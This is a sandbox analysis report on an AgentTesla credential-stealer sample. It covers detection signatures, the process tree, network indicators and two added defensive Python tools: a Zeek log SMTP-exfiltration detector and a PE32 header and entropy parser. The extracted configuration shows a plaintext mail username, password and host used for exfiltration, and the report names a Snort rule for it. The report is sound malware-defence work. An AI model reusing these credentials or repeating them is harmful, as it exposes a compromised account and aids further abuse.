
Windows Analysis Report SlipMT103.exe

Overview

General Information

Sample Name: SlipMT103.exe
Analysis ID: 528729
MD5: 5cbac1b17cef2bc95f5b18f87ec1de49
SHA1: 85d362c8463eaaf6c071414f741f32bd4cc51f0c
SHA256: 29291b4fb097c75dc3ecf4787a03175ec150319e9ab97a96b6084d1fe2dae2a5
Tags: agenttesla, exe

Detection

AgentTesla
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • SlipMT103.exe (PID: 6388 cmdline: "C:\Users\user\Desktop\SlipMT103.exe" MD5: 5CBAC1B17CEF2BC95F5B18F87EC1DE49)
    • SlipMT103.exe (PID: 6456 cmdline: C:\Users\user\Desktop\SlipMT103.exe MD5: 5CBAC1B17CEF2BC95F5B18F87EC1DE49)
  • kprUEGC.exe (PID: 2900 cmdline: "C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe" MD5: 5CBAC1B17CEF2BC95F5B18F87EC1DE49)
    • kprUEGC.exe (PID: 988 cmdline: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe MD5: 5CBAC1B17CEF2BC95F5B18F87EC1DE49)
  • kprUEGC.exe (PID: 6272 cmdline: "C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe" MD5: 5CBAC1B17CEF2BC95F5B18F87EC1DE49)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "administracion@aquanova.es", "Password": "Aquaribe2419*", "Host": "mail.aquanova.es"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000001.00000000.358186685.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000001.00000000.358186685.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0000000C.00000000.446727696.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000C.00000000.446727696.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000000.00000002.360382819.0000000002AF1000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
(35 memory-dump matches in total; first five shown, no matched strings listed)

            Unpacked PEs

Source | Rule | Description | Author
0.2.SlipMT103.exe.3c27038.5.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0.2.SlipMT103.exe.3c27038.5.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
10.2.kprUEGC.exe.44a0e18.4.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
10.2.kprUEGC.exe.44a0e18.4.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
12.0.kprUEGC.exe.400000.10.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(39 unpacked-PE matches in total; first five shown, no matched strings listed)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 1.0.SlipMT103.exe.400000.12.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "administracion@aquanova.es", "Password": "Aquaribe2419*", "Host": "mail.aquanova.es"}
Multi AV Scanner detection for submitted file
Source: SlipMT103.exe | ReversingLabs: Detection: 40%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | ReversingLabs: Detection: 40%
Source: 1.0.SlipMT103.exe.400000.{4,6,8,10,12}.unpack, 1.2.SlipMT103.exe.400000.0.unpack, 12.0.kprUEGC.exe.400000.{4,6,8,10,12}.unpack, 12.2.kprUEGC.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: SlipMT103.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: SlipMT103.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49830 -> 51.83.52.225:587
Source: Joe Sandbox View | ASN Name: OVHFR
Source: Joe Sandbox View | IP Address: 51.83.52.225
Source: global traffic | TCP traffic: 192.168.2.6:49830 -> 51.83.52.225:587
Source: SlipMT103.exe, 00000001.00000002.626792715.00000000027A1000.00000004.00000001.sdmp, kprUEGC.exe, 0000000C.00000002.624222923.00000000029E1000.00000004.00000001.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: SlipMT103.exe, 00000001.00000002.628274243.0000000002AAE000.00000004.00000001.sdmp | String found in binary or memory: http://3jx9Nc9mcrIeyBPlhe.org
Source: kprUEGC.exe, 0000000C.00000002.624222923.00000000029E1000.00000004.00000001.sdmp | String found in binary or memory: http://DrWvWz.com
Source: kprUEGC.exe, 0000000C.00000002.624222923.00000000029E1000.00000004.00000001.sdmp | String found in binary or memory: http://DynDns.comDynDNS
Source: kprUEGC.exe, 0000000D.00000002.455081302.0000000002D71000.00000004.00000001.sdmp | String found in binary or memory: http://defaultcontainer/Views/MainWindow.xaml
Source: kprUEGC.exe, 0000000D.00000002.455081302.0000000002D71000.00000004.00000001.sdmp | String found in binary or memory: http://foo/Views/MainWindow.xaml
Source: SlipMT103.exe, 00000001.00000002.628449891.0000000002AFF000.00000004.00000001.sdmp | String found in binary or memory: http://mail.aquanova.es
Source: SlipMT103.exe, 00000000.00000002.360382819.0000000002AF1000.00000004.00000001.sdmp, SlipMT103.exe, 00000000.00000002.360569240.0000000002BBA000.00000004.00000001.sdmp, kprUEGC.exe, 0000000A.00000002.451324743.000000000346B000.00000004.00000001.sdmp, kprUEGC.exe, 0000000A.00000002.451118533.00000000033A1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SlipMT103.exe, 00000001.00000002.626792715.00000000027A1000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org%$
Source: kprUEGC.exe, 0000000C.00000002.624222923.00000000029E1000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: SlipMT103.exe, 00000000.00000002.361078154.0000000003AFD000.00000004.00000001.sdmp, SlipMT103.exe, 00000001.00000000.358186685.0000000000402000.00000040.00000001.sdmp, SlipMT103.exe, 00000001.00000000.356357042.0000000000402000.00000040.00000001.sdmp, kprUEGC.exe, 0000000A.00000002.452252607.00000000043AD000.00000004.00000001.sdmp, kprUEGC.exe, 0000000C.00000000.446727696.0000000000402000.00000040.00000001.sdmp, kprUEGC.exe, 0000000C.00000000.444571373.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: SlipMT103.exe, 00000001.00000002.626792715.00000000027A1000.00000004.00000001.sdmp, kprUEGC.exe, 0000000C.00000002.624222923.00000000029E1000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown | DNS traffic detected: queries for: mail.aquanova.es
Source: SlipMT103.exe, 00000000.00000002.359649304.0000000000D9B000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
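
The exfiltration flow recorded above (a DNS lookup for mail.aquanova.es followed by 192.168.2.6:49830 -> 51.83.52.225:587) is the observable a network defender can hunt for without a sandbox. The following is an added example, not part of the Joe Sandbox report: it replays constructed Zeek-style conn.log and dns.log rows (only the first row of each mirrors the report; the other rows, the sanctioned relay 10.0.0.25, the internal network list and the field layout are assumptions) and flags every workstation-initiated TCP flow to a mail submission port whose server is not a sanctioned relay, attaching the hostname that resolved to the server. It matches on the flow tuple rather than on payload because the Snort content rule listed above only sees the stolen data while the session is still in clear text, and port 587 sessions normally switch to TLS after STARTTLS.

```python
import ipaddress
from collections import defaultdict

# Constructed Zeek-style records (tab-separated). Only the first conn.log row and the first
# dns.log row mirror the sandbox observation; every other row is made up for this example.
CONN_FIELDS = ("ts", "uid", "id.orig_h", "id.orig_p", "id.resp_h", "id.resp_p", "proto", "service")
CONN_LOG = """\
#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\tservice
1637000001.100\tCabc1\t192.168.2.6\t49830\t51.83.52.225\t587\ttcp\tsmtp
1637000002.200\tCabc2\t192.168.2.6\t49831\t142.250.74.78\t443\ttcp\tssl
1637000003.300\tCabc3\t192.168.2.7\t51000\t10.0.0.25\t25\ttcp\tsmtp
1637000004.400\tCabc4\t192.168.2.9\t52000\t198.51.100.7\t465\ttcp\tssl
1637000005.500\tCabc5\t192.168.2.9\t52001\t10.0.0.40\t587\ttcp\t-
"""
DNS_FIELDS = ("ts", "uid", "id.orig_h", "query", "answer")
DNS_LOG = """\
1637000000.900\tDabc1\t192.168.2.6\tmail.aquanova.es\t51.83.52.225
1637000004.300\tDabc2\t192.168.2.9\tsmtp.example.net\t198.51.100.7
"""

MAIL_PORTS = {25, 465, 587}
# Assumptions for the example: RFC 1918 space counts as internal, and 10.0.0.25 is the only
# relay that workstations are allowed to submit mail to.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
SANCTIONED_RELAYS = {"10.0.0.25"}


def parse_tsv(text, fields):
    """Parse tab-separated rows into dicts, skipping Zeek '#' header lines and malformed rows."""
    records = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split("\t")
        if len(parts) != len(fields):
            continue  # a truncated row must not abort the whole pass
        records.append(dict(zip(fields, parts)))
    return records


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def names_resolved_to(dns_text):
    """Map each answered address to the names that resolved to it, so alerts carry a hostname."""
    table = defaultdict(set)
    for rec in parse_tsv(dns_text, DNS_FIELDS):
        table[rec["answer"]].add(rec["query"])
    return table


def find_smtp_exfil(conn_text, dns_text, relays=SANCTIONED_RELAYS):
    """Flag every TCP flow to a mail submission port whose server is not a sanctioned relay.

    The match is on the flow tuple, not on payload: once the client issues STARTTLS on 587 the
    SMTP commands and the stolen data are encrypted, so a content signature only sees them when
    the session stays in clear text.
    """
    names = names_resolved_to(dns_text)
    alerts = []
    for rec in parse_tsv(conn_text, CONN_FIELDS):
        port = int(rec["id.resp_p"])
        dst = rec["id.resp_h"]
        if rec["proto"] != "tcp" or port not in MAIL_PORTS or dst in relays:
            continue
        alerts.append({
            "uid": rec["uid"],
            "src": rec["id.orig_h"],
            "dst": dst,
            "port": port,
            "external": not is_internal(dst),
            "names": sorted(names.get(dst, ())),
        })
    return alerts


if __name__ == "__main__":
    for a in find_smtp_exfil(CONN_LOG, DNS_LOG):
        print(f"{a['src']} -> {a['dst']}:{a['port']} external={a['external']} names={a['names']}")
```

Internal, non-sanctioned mail servers are reported too (with external=False) rather than silently allowed, since a workstation has no business submitting mail anywhere but the relay; widen the relay set rather than the port list when tuning this.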

Spam, unwanted Advertisements and Ransom Demands:

Modifies the hosts file
Source: C:\Users\user\Desktop\SlipMT103.exe | File written: C:\Windows\System32\drivers\etc\hosts

System Summary:

.NET source code contains very large array initializations
Source: 1.0.SlipMT103.exe.400000.12.unpack, 1.2.SlipMT103.exe.400000.0.unpack, 1.0.SlipMT103.exe.400000.6.unpack, 1.0.SlipMT103.exe.400000.4.unpack; <PrivateImplementationDetails>{63122FA5-5709-4B59-B007-C8CBD87FA871}/07651BC3-27A7-47FF-A50A-5D7213AA2347.cs | Large array initialization: .cctor: array initializer size 11963
Source: SlipMT103.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\SlipMT103.exe | Code functions: 0_2_00685C24, 0_2_00686DBD, 0_2_01108250, 0_2_0110D2F8, 0_2_0528F538
Source: C:\Users\user\Desktop\SlipMT103.exe | Code functions: 1_2_00456DBD, 1_2_0093CC88, 1_2_00934130, 1_2_00939528, 1_2_009316ED, 1_2_00934BD8, 1_2_0093CC29, 1_2_009345B8, 1_2_00B8ED30, 1_2_00B82618, 1_2_00B8CE40, 1_2_00B81FF0, 1_2_00B8ED78, 1_2_00B88FF8, 1_2_00C285E0, 1_2_00C21620, 1_2_00C296B0, 1_2_00C26AF8, 1_2_00C27CF0, 1_2_00C21F90, 1_2_00CAA228, 1_2_00CA3764, 1_2_027347A0, 1_2_02733CCC, 1_2_027346B0
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Code functions: 10_2_00EE5C24, 10_2_00EE6DBD, 10_2_01778250, 10_2_0177D2F8, 10_2_059BF538, 10_2_059B5AB0, 10_2_059B5AA0
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Code functions: 12_2_00726DBD, 12_2_04F047A0, 12_2_04F046B0
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Code functions: 13_2_00976DBD, 13_2_00975C24
Source: SlipMT103.exe, 00000000.00000002.361078154.0000000003AFD000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameCHSfumdsoSQKEDPbMIzAYpYIlMWkeKqWpKhYN.exe4 vs SlipMT103.exe
Source: SlipMT103.exe, 00000000.00000002.361078154.0000000003AFD000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUI.dll@ vs SlipMT103.exe
Source: SlipMT103.exe, 00000000.00000002.360382819.0000000002AF1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameInnerException.dll" vs SlipMT103.exe
Source: SlipMT103.exe, 00000000.00000002.360382819.0000000002AF1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameCHSfumdsoSQKEDPbMIzAYpYIlMWkeKqWpKhYN.exe4 vs SlipMT103.exe
Source: SlipMT103.exe, 00000000.00000002.363621555.0000000005A00000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameInnerException.dll" vs SlipMT103.exe
Source: SlipMT103.exe, 00000000.00000002.359463739.0000000000700000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameIArraySortHelp.exe. vs SlipMT103.exe
Source: SlipMT103.exe, 00000000.00000002.364091388.0000000005F80000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameUI.dll@ vs SlipMT103.exe
Source: SlipMT103.exe, 00000000.00000002.360569240.0000000002BBA000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameInnerException.dll" vs SlipMT103.exe
Source: SlipMT103.exe, 00000001.00000000.358186685.0000000000402000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameCHSfumdsoSQKEDPbMIzAYpYIlMWkeKqWpKhYN.exe4 vs SlipMT103.exe
Source: SlipMT103.exe, 00000001.00000000.355626536.00000000004D0000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameIArraySortHelp.exe. vs SlipMT103.exe
Source: SlipMT103.exe, 00000001.00000002.621068774.00000000008F8000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs SlipMT103.exe
Source: SlipMT103.exe | Binary or memory string: OriginalFilenameIArraySortHelp.exe. vs SlipMT103.exe
Source: SlipMT103.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: kprUEGC.exe.1.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: SlipMT103.exe | ReversingLabs: Detection: 40%
Source: C:\Users\user\Desktop\SlipMT103.exe | File read: C:\Users\user\Desktop\SlipMT103.exe:Zone.Identifier
Source: C:\Users\user\Desktop\SlipMT103.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\SlipMT103.exe "C:\Users\user\Desktop\SlipMT103.exe"
Source: C:\Users\user\Desktop\SlipMT103.exe | Process created: C:\Users\user\Desktop\SlipMT103.exe C:\Users\user\Desktop\SlipMT103.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe "C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe"
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Process created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe "C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe"
Source: C:\Users\user\Desktop\SlipMT103.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
Source: C:\Users\user\Desktop\SlipMT103.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\SlipMT103.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\SlipMT103.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SlipMT103.exe.log
Source: classification engine | Classification label: mal100.troj.adwa.spyw.evad.winEXE@7/5@1/1
Source: C:\Users\user\Desktop\SlipMT103.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll (2 occurrences)
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll (3 occurrences)
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
Source: SlipMT103.exe | String found in binary or memory: /IArraySortHelp;component/views/addbook.xaml
Source: SlipMT103.exe | String found in binary or memory: views/addbook.baml
Source: SlipMT103.exe | String found in binary or memory: views/addcustomer.baml
Source: SlipMT103.exe | String found in binary or memory: /IArraySortHelp;component/views/addcustomer.xaml
Source: kprUEGC.exe | String found in binary or memory: /IArraySortHelp;component/views/addbook.xaml
Source: kprUEGC.exe | String found in binary or memory: views/addcustomer.baml
Source: kprUEGC.exe | String found in binary or memory: views/addbook.baml
Source: kprUEGC.exe | String found in binary or memory: /IArraySortHelp;component/views/addcustomer.xaml
Source: SlipMT103.exe | String found in binary or memory: Y/IArraySortHelp;component/views/addbook.xamlo/IArraySortHelp;component/views/borrowfrombookview.xamle/IArraySortHelp;component/views/borrowingview.xaml_/IArraySortHelp;component/views/changebook.xamlg/IArraySortHelp;component/views/changecustomer.xamlc/IArraySortHelp;component/views/customerview.xamlg/IArraySortHelp;component/views/deletecustomer.xaml]/IArraySortHelp;component/views/errorview.xamla/IArraySortHelp;component/views/smallextras.xamla/IArraySortHelp;component/views/addcustomer.xaml
Source: SlipMT103.exe | String found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml
Source: 1.0.SlipMT103.exe.400000.12.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 1.2.SlipMT103.exe.400000.0.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 1.0.SlipMT103.exe.400000.6.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Users\user\Desktop\SlipMT103.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\SlipMT103.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\SlipMT103.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: SlipMT103.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: SlipMT103.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
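
The static PE facts the report lists for SlipMT103.exe (32BIT_MACHINE, the NO_SEH / TERMINAL_SERVER_AWARE / DYNAMIC_BASE / NX_COMPAT DllCharacteristics, the IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR directory that marks a managed assembly, the .text section flags, and the .text entropy of 7.88568951342 given under Data Obfuscation) can be reproduced from the file alone. The following is an added example, not part of the Joe Sandbox report: a PE32 header parser built on Python's standard library that extracts those fields and flags an executable section whose entropy sits at or above a threshold, which together with a CLR header is the profile of a packed .NET loader. The synthetic image builder exists only so the example runs offline without a sample; the 7.0 threshold and the 0x8540 flag value used for the fixture are assumptions, and 64-bit (PE32+) images are deliberately rejected.

```python
import math
import struct

IMAGE_FILE_32BIT_MACHINE = 0x0100
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
DLL_CHARACTERISTICS = {0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT",
                       0x0400: "NO_SEH", 0x8000: "TERMINAL_SERVER_AWARE"}
COM_DESCRIPTOR_INDEX = 14  # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR; non-zero means a managed (.NET) image


def shannon_entropy(data):
    """Bits per byte: 0.0 for an empty or constant buffer, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe32(blob):
    """Return the PE32 header fields that appear as 'Static PE information' in the report."""
    if blob[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    coff = e_lfanew + 4
    _machine, nsec, _ts, _psym, _nsym, opt_size, file_chars = struct.unpack_from("<HHIIIHH", blob, coff)
    opt = coff + 20
    if struct.unpack_from("<H", blob, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) optional headers are handled here")
    dll_chars = struct.unpack_from("<H", blob, opt + 70)[0]
    ndirs = struct.unpack_from("<I", blob, opt + 92)[0]
    clr_rva = clr_size = 0
    if ndirs > COM_DESCRIPTOR_INDEX:
        clr_rva, clr_size = struct.unpack_from("<II", blob, opt + 96 + 8 * COM_DESCRIPTOR_INDEX)
    sections = []
    for i in range(nsec):  # section table follows the optional header, 40 bytes per entry
        name, _vs, _va, raw_size, raw_ptr, _, _, _, _, sec_chars = struct.unpack_from(
            "<8sIIIIIIHHI", blob, opt + opt_size + 40 * i)
        raw = blob[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "entropy": round(shannon_entropy(raw), 3),
                         "executable": bool(sec_chars & IMAGE_SCN_MEM_EXECUTE),
                         "code": bool(sec_chars & IMAGE_SCN_CNT_CODE),
                         "readable": bool(sec_chars & IMAGE_SCN_MEM_READ)})
    return {"is_32bit": bool(file_chars & IMAGE_FILE_32BIT_MACHINE),
            "dll_characteristics": [n for bit, n in DLL_CHARACTERISTICS.items() if dll_chars & bit],
            "is_dotnet": clr_rva != 0 and clr_size != 0,
            "sections": sections}


def packed_dotnet_indicators(info, threshold=7.0):
    """Reasons (empty list = none) the image fits the packed .NET loader profile; threshold is an assumption."""
    reasons = []
    if info["is_dotnet"]:
        reasons.append("CLR header present (managed assembly)")
    for s in info["sections"]:
        if s["executable"] and s["entropy"] >= threshold:
            reasons.append(f"executable section {s['name']} has entropy {s['entropy']}")
    return reasons


def build_synthetic_pe32(text_bytes, dotnet=True, dll_chars=0x8540):
    """Build a minimal PE32 image in memory so the parser runs offline (test fixture, not a sample).

    0x8540 = TERMINAL_SERVER_AWARE | NO_SEH | NX_COMPAT | DYNAMIC_BASE, the set the report lists for SlipMT103.exe.
    """
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)  # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)  # I386, one section, EXECUTABLE_IMAGE | 32BIT_MACHINE
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)  # PE32 magic
    struct.pack_into("<H", opt, 70, dll_chars)
    struct.pack_into("<I", opt, 92, 16)  # NumberOfRvaAndSizes
    if dotnet:
        struct.pack_into("<II", opt, 96 + 8 * COM_DESCRIPTOR_INDEX, 0x2008, 0x48)  # CLR header RVA / size
    raw_ptr = 0x200
    sec = struct.pack("<8sIIIIIIHHI", b".text", len(text_bytes), 0x2000, len(text_bytes), raw_ptr, 0, 0, 0, 0,
                      IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
    image = bytearray(dos + b"PE\0\0" + coff + opt + sec)
    image += b"\0" * (raw_ptr - len(image))
    return bytes(image + text_bytes)
```

A normal .NET assembly also carries the CLR header, so that flag alone says nothing; it is the combination with a near-8.0 executable section (compiled MSIL usually sits well below 7) that matches the Assembly.Load(byte[]) unpacker pattern this sample shows.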

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: SlipMT103.exe, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.0.SlipMT103.exe.680000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.2.SlipMT103.exe.680000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: kprUEGC.exe.1.dr, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.SlipMT103.exe.450000.9.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.SlipMT103.exe.450000.13.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.SlipMT103.exe.450000.3.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.SlipMT103.exe.450000.7.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.SlipMT103.exe.450000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.2.SlipMT103.exe.450000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.SlipMT103.exe.450000.2.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\SlipMT103.exe | Code function: 0_2_00689361 push ds; retf
                      Source: C:\Users\user\Desktop\SlipMT103.exe | Code function: 0_2_006892F5 push ds; ret
                      Source: C:\Users\user\Desktop\SlipMT103.exe | Code function: 0_2_00689347 push ds; ret
